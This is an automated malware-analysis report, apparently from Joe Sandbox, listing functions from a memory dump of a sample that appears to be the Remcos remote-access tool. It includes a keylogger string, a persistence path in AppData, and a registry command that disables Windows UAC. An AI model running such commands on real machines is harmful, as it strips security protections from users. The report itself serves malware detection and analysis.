                                    Function 00442851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                    • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                    • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                    • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                    Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                    • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                    • CloseHandle.KERNEL32(?), ref: 00404DDB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                    • String ID: PkGNG
                                    • API String ID: 3360349984-263838557
                                    • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                    • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                    • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                    • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                    Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                    • wsprintfW.USER32 ref: 0040B22E
                                      • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventLocalTimewsprintf
                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                    • API String ID: 1497725170-248792730
                                    • Opcode ID: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                    • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                    • Opcode Fuzzy Hash: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                    • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                    Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                    • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID: XQG
                                    • API String ID: 1958988193-3606453820
                                    • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                    • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                    • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                    • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                    Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                    • GetLastError.KERNEL32 ref: 0041D611
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                    • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                    • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                    • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                    Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                    • CloseHandle.KERNEL32(?), ref: 004077E5
                                    • CloseHandle.KERNEL32(?), ref: 004077EA
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                    • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                    • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                    • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                    • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                    Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                    Download Yara Rule
                                    Strings
                                    • C:\Users\user\AppData\Roaming\keHuNxIumw.exe, xrefs: 004076FF
                                    • SG, xrefs: 00407715
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: SG$C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                    • API String ID: 0-1716542089
                                    • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                    • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                    • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                    • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                    Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                    • SetEvent.KERNEL32(?), ref: 0040512C
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                    • CloseHandle.KERNEL32(?), ref: 00405140
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: KeepAlive | Disabled
                                    • API String ID: 2993684571-305739064
                                    • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                    • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                    • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                    • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                    Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                    • Sleep.KERNEL32(00002710), ref: 0041AE98
                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                    • String ID: Alarm triggered
                                    • API String ID: 614609389-2816303416
                                    • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                    • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                    • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                    • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                    Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                    Strings
                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                    • API String ID: 3024135584-2418719853
                                    • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                    • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                    • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                    • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                    Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                    • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                    • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                    • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                    Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                    • _free.LIBCMT ref: 0044943D
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 00449609
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID:
                                    • API String ID: 1286116820-0
                                    • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                    • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                    • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                    • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                    Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                      • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                      • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                      • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4269425633-0
                                    • Opcode ID: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                    • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                    • Opcode Fuzzy Hash: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                    • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                    Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                    • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                    • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                    • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                    Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                      • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                    • _free.LIBCMT ref: 0044F43F
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                    • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                    • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                    • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                    Function 0041C482 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreatePointerWrite
                                    • String ID:
                                    • API String ID: 1852769593-0
                                    • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                    • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                    • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                    • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                    Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                    • _free.LIBCMT ref: 00448353
                                    • _free.LIBCMT ref: 0044837A
                                    • SetLastError.KERNEL32(00000000), ref: 00448387
                                    • SetLastError.KERNEL32(00000000), ref: 00448390
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                    • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                    • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                    • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                    Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00450A54
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 00450A66
                                    • _free.LIBCMT ref: 00450A78
                                    • _free.LIBCMT ref: 00450A8A
                                    • _free.LIBCMT ref: 00450A9C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                    Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00444106
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 00444118
                                    • _free.LIBCMT ref: 0044412B
                                    • _free.LIBCMT ref: 0044413C
                                    • _free.LIBCMT ref: 0044414D
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                    Function 0044BAB7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                    • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                    • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                    • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                    Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strpbrk.LIBCMT ref: 0044E7B8
                                    • _free.LIBCMT ref: 0044E8D5
                                      • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                      • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                      • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
